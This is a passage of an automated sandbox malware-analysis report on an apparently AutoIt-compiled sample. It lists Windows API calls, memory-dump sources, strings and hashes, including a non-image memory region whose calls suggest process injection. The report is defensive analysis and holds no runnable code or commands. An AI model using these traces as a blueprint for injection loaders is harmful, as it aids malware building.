                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01E426A1
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01E428C7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1707404067.0000000001E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1e40000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CreateFileFreeVirtual
                                    • String ID:
                                    • API String ID: 204039940-0

                                    Control-flow Graph

                                    APIs
                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00782C91
                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00782CB2
                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00781CAD,?), ref: 00782CC6
                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00781CAD,?), ref: 00782CCF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Window$CreateShow
                                    • String ID: AutoIt v3$edit
                                    • API String ID: 1584632944-3779509399

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 01E422A0: Sleep.KERNELBASE(000001F4), ref: 01E422B1
                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01E424BB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1707404067.0000000001E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1e40000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CreateFileSleep
                                    • String ID: 2RTZRRXZMKRN1KM
                                    • API String ID: 2694422964-3181753370

                                    Control-flow Graph

                                    APIs
                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007F2C05
                                    • DeleteFileW.KERNEL32(?), ref: 007F2C87
                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007F2C9D
                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007F2CAE
                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007F2CC0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: File$Delete$Copy
                                    • String ID:
                                    • API String ID: 3226157194-0

                                    Control-flow Graph

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: JOx
                                    • API String ID: 0-2876472256
                                    APIs
                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00783B0F,SwapMouseButtons,00000004,?), ref: 00783B40
                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00783B0F,SwapMouseButtons,00000004,?), ref: 00783B61
                                    • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00783B0F,SwapMouseButtons,00000004,?), ref: 00783B83
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: Control Panel\Mouse
                                    • API String ID: 3677997916-824357125
                                    APIs
                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 01E41A5B
                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01E41AF1
                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01E41B13
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1707404067.0000000001E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1e40000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                    • String ID:
                                    • API String ID: 2438371351-0
                                    Strings
                                    • Variable must be of type 'Object'., xrefs: 007D32B7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Variable must be of type 'Object'.
                                    • API String ID: 0-109567571
                                    APIs
                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 007C33A2
                                      • Part of subcall function 00786B57: _wcslen.LIBCMT ref: 00786B6A
                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00783A04
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: IconLoadNotifyShell_String_wcslen
                                    • String ID: Line:
                                    • API String ID: 2289894680-1585850449
                                    APIs
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 007A0668
                                      • Part of subcall function 007A32A4: RaiseException.KERNEL32(?,?,?,007A068A,?,00851444,?,?,?,?,?,?,007A068A,00781129,00848738,00781129), ref: 007A3304
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 007A0685
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Exception@8Throw$ExceptionRaise
                                    • String ID: Unknown exception
                                    • API String ID: 3476068407-410509341
                                    APIs
                                    • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 007F302F
                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 007F3044
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Temp$FileNamePath
                                    • String ID: aut
                                    • API String ID: 3285503233-3010740371
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 008082F5
                                    • TerminateProcess.KERNEL32(00000000), ref: 008082FC
                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 008084DD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Process$CurrentFreeLibraryTerminate
                                    • String ID:
                                    • API String ID: 146820519-0
                                    APIs
                                      • Part of subcall function 00781BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00781BF4
                                      • Part of subcall function 00781BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00781BFC
                                      • Part of subcall function 00781BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00781C07
                                      • Part of subcall function 00781BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00781C12
                                      • Part of subcall function 00781BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00781C1A
                                      • Part of subcall function 00781BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00781C22
                                      • Part of subcall function 00781B4A: RegisterWindowMessageW.USER32(00000004,?,007812C4), ref: 00781BA2
                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0078136A
                                    • OleInitialize.OLE32 ref: 00781388
                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 007C24AB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                    • String ID:
                                    • API String ID: 1986988660-0
                                    • Opcode ID: b28d83da46c11c4ef79a1e6dba1781999d667884430710aa80bcc54cfac6e306
                                    • Instruction ID: 908ce037269e77433c52258164690217952ee361540fb9145ff3799d3cd54bbd
                                    • Opcode Fuzzy Hash: b28d83da46c11c4ef79a1e6dba1781999d667884430710aa80bcc54cfac6e306
                                    • Instruction Fuzzy Hash: A371B9B49513008FCF84EFB9A84D7A53AE5FB88346754863AD51AC7361FB384889CF45
                                    APIs
                                      • Part of subcall function 00783923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00783A04
                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007EC259
                                    • KillTimer.USER32(?,00000001,?,?), ref: 007EC261
                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007EC270
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: IconNotifyShell_Timer$Kill
                                    • String ID:
                                    • API String ID: 3500052701-0
                                    • Opcode ID: f7617600ef70528032bd26599e9ce66f1c458b80479e07d77417e56ecd342a9f
                                    • Instruction ID: 28eeafc921f07222ec38871b5eaaef21d3404fdd15153a367da4fcb09a99425a
                                    • Opcode Fuzzy Hash: f7617600ef70528032bd26599e9ce66f1c458b80479e07d77417e56ecd342a9f
                                    • Instruction Fuzzy Hash: E831C574905384AFEB239F658855BE7BBECAF0A308F004499D2DA97241C3785A85CB51
                                    APIs
                                    • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,007B85CC,?,00848CC8,0000000C), ref: 007B8704
                                    • GetLastError.KERNEL32(?,007B85CC,?,00848CC8,0000000C), ref: 007B870E
                                    • __dosmaperr.LIBCMT ref: 007B8739
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                    • String ID:
                                    • API String ID: 490808831-0
                                    • Opcode ID: 1513a7a4bb1d14ddda25f5f79532c313eccbf8084f917a3c8683f7a856352d9b
                                    • Instruction ID: 90b5730838f4e62e1af10849dd0d8b50288986f99d8593f0d291f9df550d7843
                                    • Opcode Fuzzy Hash: 1513a7a4bb1d14ddda25f5f79532c313eccbf8084f917a3c8683f7a856352d9b
                                    • Instruction Fuzzy Hash: CC014E3260572066D6E47374A8497FE678D5B8277CF390119F8148B2D3DEBDCC81C552
                                    APIs
                                    • TranslateMessage.USER32(?), ref: 0078DB7B
                                    • DispatchMessageW.USER32(?), ref: 0078DB89
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0078DB9F
                                    • Sleep.KERNEL32(0000000A), ref: 0078DBB1
                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 007D1CC9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                    • String ID:
                                    • API String ID: 3288985973-0
                                    • Opcode ID: 8a4105b4b5fec235f31ce45ce05e523d250ee9ba886857aee48335363cc9c136
                                    • Instruction ID: 3b4e2f76e1a9407aa877bf6c253903f6c48d57727acad431a17f5c8eb7784292
                                    • Opcode Fuzzy Hash: 8a4105b4b5fec235f31ce45ce05e523d250ee9ba886857aee48335363cc9c136
                                    • Instruction Fuzzy Hash: 50F05E706843409BEB30DBA09C49FEA73BDFF44311F508929E61AC30C0DB7894488B25
                                    APIs
                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,007F2CD4,?,?,?,00000004,00000001), ref: 007F2FF2
                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,007F2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007F3006
                                    • CloseHandle.KERNEL32(00000000,?,007F2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007F300D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: File$CloseCreateHandleTime
                                    • String ID:
                                    • API String ID: 3397143404-0
                                    • Opcode ID: 1aff14615981d691d566a2e094f30d2178e41bd2bfa2cf5171c7c534a4d66c28
                                    • Instruction ID: fe4c005f9f71335c0ff7097f3fbc5d31fa7b5b5120d87dd6d35548b06861dc1d
                                    • Opcode Fuzzy Hash: 1aff14615981d691d566a2e094f30d2178e41bd2bfa2cf5171c7c534a4d66c28
                                    • Instruction Fuzzy Hash: 3AE086322C022477D2302755BC0DFDB3A1DEB86B71F108210F729751D086A0160142A8
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 007917F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Init_thread_footer
                                    • String ID: CALL
                                    • API String ID: 1385522511-4196123274
                                    • Opcode ID: 78bc6c39c2fa5d2bcb3960c8835127de29897e5fd0f96f1c7dc6169f76bf9004
                                    • Instruction ID: 44edf88f83be3483aef64e366e189834e52180ce2a1550c22e54a27e58c5db20
                                    • Opcode Fuzzy Hash: 78bc6c39c2fa5d2bcb3960c8835127de29897e5fd0f96f1c7dc6169f76bf9004
                                    • Instruction Fuzzy Hash: 7222BC70608342DFCB14DF14E484A2ABBF1BF89314F54895DF4968B3A1D739E865CB92
                                    APIs
                                    • _wcslen.LIBCMT ref: 007F6F6B
                                      • Part of subcall function 00784ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00851418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00784EFD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: LibraryLoad_wcslen
                                    • String ID: >>>AUTOIT SCRIPT<<<
                                    • API String ID: 3312870042-2806939583
                                    • Opcode ID: 5dd1045738619d43ede3b73824061c3d59eba86183d603d2ca0aeb66030731ea
                                    • Instruction ID: 151c2742b3afeff1643a32f98c5befc4c2a8d920259d9e11e1c00973a13e9b42
                                    • Opcode Fuzzy Hash: 5dd1045738619d43ede3b73824061c3d59eba86183d603d2ca0aeb66030731ea
                                    • Instruction Fuzzy Hash: 4EB17A31108205DFDB18FF20C89596AB7E5BF94310F14892DF596972A2EB38ED49CB92
                                    APIs
                                    • GetOpenFileNameW.COMDLG32(?), ref: 007C2C8C
                                      • Part of subcall function 00783AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00783A97,?,?,00782E7F,?,?,?,00000000), ref: 00783AC2
                                      • Part of subcall function 00782DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00782DC4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Name$Path$FileFullLongOpen
                                    • String ID: X
                                    • API String ID: 779396738-3081909835
                                    • Opcode ID: 26f86d6eae62979c48995b9351456530fa49e2b8629a14b7f11ca4e34016086c
                                    • Instruction ID: c2ad12b6c7fc7df93be76991dfbfece6f5de698dc123a1193ebff560dbdca86c
                                    • Opcode Fuzzy Hash: 26f86d6eae62979c48995b9351456530fa49e2b8629a14b7f11ca4e34016086c
                                    • Instruction Fuzzy Hash: A5219371A002589BCF01EF94C849BEE7BF8AF49715F008059E505E7242EBBC5A498FA1
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: __fread_nolock
                                    • String ID: EA06
                                    • API String ID: 2638373210-3962188686
                                    • Opcode ID: e038a17287da4a6e73e7967a956485b6ca0c62a0274ad1f53de1f832250b5a0f
                                    • Instruction ID: baea5e1590adc52213653a74a690bcb2d15063119f9e2b1bd44f60dae28f7dcc
                                    • Opcode Fuzzy Hash: e038a17287da4a6e73e7967a956485b6ca0c62a0274ad1f53de1f832250b5a0f
                                    • Instruction Fuzzy Hash: C101B971904258BEDF18D7A8C85AEFE7BF8DB45301F00459AE152D2181E578E7148B60
                                    APIs
                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00783908
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: IconNotifyShell_
                                    • String ID:
                                    • API String ID: 1144537725-0
                                    • Opcode ID: 19fd00ef275ca52a8f5329be7a2f2f0530c94e7b51e27646557ae51736bba7c8
                                    • Instruction ID: 68f8d6aff6007c6643f02d9847e03100b19a018e414a11935c710482921c5ee3
                                    • Opcode Fuzzy Hash: 19fd00ef275ca52a8f5329be7a2f2f0530c94e7b51e27646557ae51736bba7c8
                                    • Instruction Fuzzy Hash: 7E318E70644701DFD720EF28D899BD7BBE8FB49709F00092EF99983250E779AA44CB52
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 0078BB4E
                                    Memory Dump Source
